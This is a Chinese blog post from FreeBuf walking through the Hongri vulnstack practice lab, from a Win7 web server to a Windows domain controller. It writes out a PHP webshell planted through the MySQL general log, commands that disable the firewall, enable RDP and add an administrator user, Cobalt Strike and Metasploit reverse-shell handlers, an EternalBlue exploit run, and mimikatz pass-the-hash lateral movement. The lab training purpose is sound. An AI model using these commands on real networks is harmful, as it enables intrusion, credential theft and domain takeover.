freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

红日靶场(一)
今天没吃饭gg 2025-01-06 09:43:32 13011
所属地 四川省

红日靶场:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

网络配置

攻击机 kali:192.168.108.128。

win7(web服务器)双网卡:192.168.108.132,192.168.52.143

192.168.108.132连外网与kali一个网段,都是VMnet8,192.168.52.143连内网网段,都是VMnet1

Windows 2008 (域控):192.168.52.138。

Win2k3 (域管):192.168.52.141。

因为我的kali是108网段的,所以web服务器连外网的网卡需要手动更改为,这里你们kali是什么网段就改成什么。

web渗透

1)信息收集

nmap扫描端口,开放了3306,135,139,445等端口,

1735895577_6777aa19875df6ff489bd.png!small?1735895574865

dirsearch,御剑,dirb几个目录扫描工具一起扫目录

1735895630_6777aa4ed75168b8dca07.png!small?1735895629127

扫出phpadmin和备份文件(还有/yxcms目录但是我没扫出来

2)getshell

进入phpadmin页面,测试口令 admin/admin成功登入,phpadmin有两种方法getshell

(1)into out导出木马

需要三个条件

- 知道绝对路径
- secure_file_priv =""(默认为null,这里不满足此项)
- 具有root权限

(2)利用mysql日志文件getshell

执行show variables like '%general%';查看日志状态

1735896058_6777abfa597a2202c0be9.png!small?1735896055561

general_log全局日志功能关闭了,需要通过命令开启,SET GLOBAL general_log='on'SET GLOBAL general_log_file='C:/phpStudy/www/hack.php'执行sql语句,开启日志并重新设置日志文件存放位置,执行SELECT '<?php eval($_POST["cmd"]);?>'后可以用哥斯拉连上shell,成功拿到web服务器权限

1735896304_6777acf0a315608ccb1a3.png!small?1735896305461

内网信息探测

getshell后发现是administrator权限,是192.168.52.143/24网段

netsh advfirewall set allprofiles state offwin关闭防火墙

1)上线cs

在kali上启动cs服务器

1735896445_6777ad7d334af460b95b5.png!small?1735896442418

物理机启动客户端,连接服务端,添加监听器,hosts就是服务器ip

1735896527_6777adcfaf5e948811e28.png!small?1735896524929

生成exe后门,选择刚刚建立的监听器,用哥斯拉将payload文件上传至win7并执行,能看见cs上线

1735896542_6777adde6528d2788c0db.png!small?1735896539610

上线后执行sleep 0,不然响应时间很长,在输入的命令前都要加上shell

shell systeminfo 查看系统信息,看到只打了四个补丁,尝试进行提权

1735896597_6777ae1593a5f79cd62ac.png!small?1735896594759

这里我选择的是svc-exe,成功提升到system权限

1735896638_6777ae3e7aeb76e0b881e.png!small?1735896635748

2)收集内网信息
  1. 判断是否存在域net config Workstation,当前域为god,可以用net view /domain查看是否有其他域

1736125998_677b2e2e1552dd610587e.png!small?1736125991629

2. 找出域控与域内其他主机,net group "domain controllers" /domain域控为owa

1736126032_677b2e50dac9181337803.png!small?1736126026401

3. 查看局域网内其他主机信息: net view

1736126060_677b2e6c5931cff234450.png!small?1736126053790

域内还存在一台主机192.168.52.141,域控主机为192.168.52.138

接下来的目标就是横向渗透拿下域控

3)rdp远程连接win7(可选)
  1. 远程连接需要开启3389端口,关闭防火墙

    #注册表开启3389端口

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

    #添加防火墙规则netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

    #关闭防火墙netsh firewall set opmode disable#winsows server 2003 之前netsh advfirewall set allprofiles state off#winsows server 2003 之后

  2. 新建用户并加入administrators组

  • net user test Passwd123 /addnet localgroup administrators test /add

后渗透

1)CS派生会话给MSF(可选)
  1. msf开启监听

    msfconsole

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_http

    set lhost 192.168.236.128

    set lport 1111 exploit

  2. CS新建一个监听器,注意payload是foreign、reverse_http,name为MSF,端口是msf监听的端口

1736126747_677b311bb799925b2e173.png!small?1736126741163

选择将要转发的会话,执行spawn MSF,msf成功收到会话

1736126881_677b31a14e4c2e88b2950.png!small?1736126875085

2)MSF简单利用-永恒之蓝
  1. run post/windows/gather/checkvm可以检测判断靶机是否属于虚拟机(是否进入蜜罐)

  2. 先执行background 命令将当前执行的 Meterpreter 会话切换到后台(后续也可执行sessions -i 重新返回会话),然后使用 MSF 自带auxiliary/scanner/portscan/tcp模块扫描内网域成员主机 192.168.52.138 开放的端口:

    use auxiliary/scanner/portscan/tcp

    set rhosts 192.168.52.138

    set ports 80,135-139,445,3306,3389

    run

    也可以用cs插件

  3. 通过上传fscan或者cs插件、扫出135、139、445端口都能知道域控存在永恒之蓝,msf直接exp

    use exploit/windows/smb/ms17_010_eternalblue

    set payload windows/x64/meterpreter/bind_tcp #内网环境,需要正向shell连接

    set rhosts 192.168.52.138

    run

    但是最后没有生成会话,没拿到shell,失败

3)哈希传递(PTH)拿下域控

哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统。 攻击者无须通过解密hash值来获取明文密码。

通过cs自带的mimikatz抓取web服务器的哈希与明文

1736127135_677b329f69f6d014b4884.png!small?1736127129010

进入目标列表,找到其他的目标主机,通过psexec进行横向移动

1736127162_677b32ba55aa173ea0c4c.png!small?1736127155764

自动填写刚刚抓取到的密码,监听器选择smb,会话选择web服务器的会话

1736127207_677b32e7bf82fafa1da30.png!small?1736127201418

已经取得了域控主机权限。

1736127226_677b32fabd0e2eeb03fe0.png!small?1736127220335

1736127235_677b330371b0f4a4bf519.png!small?1736127228977

# 渗透测试 # web安全 # 内网渗透
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 今天没吃饭gg 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
今天没吃饭gg LV.1
这家伙太懒了,还未填写个人描述!
  • 1 文章数
  • 0 关注者
文章目录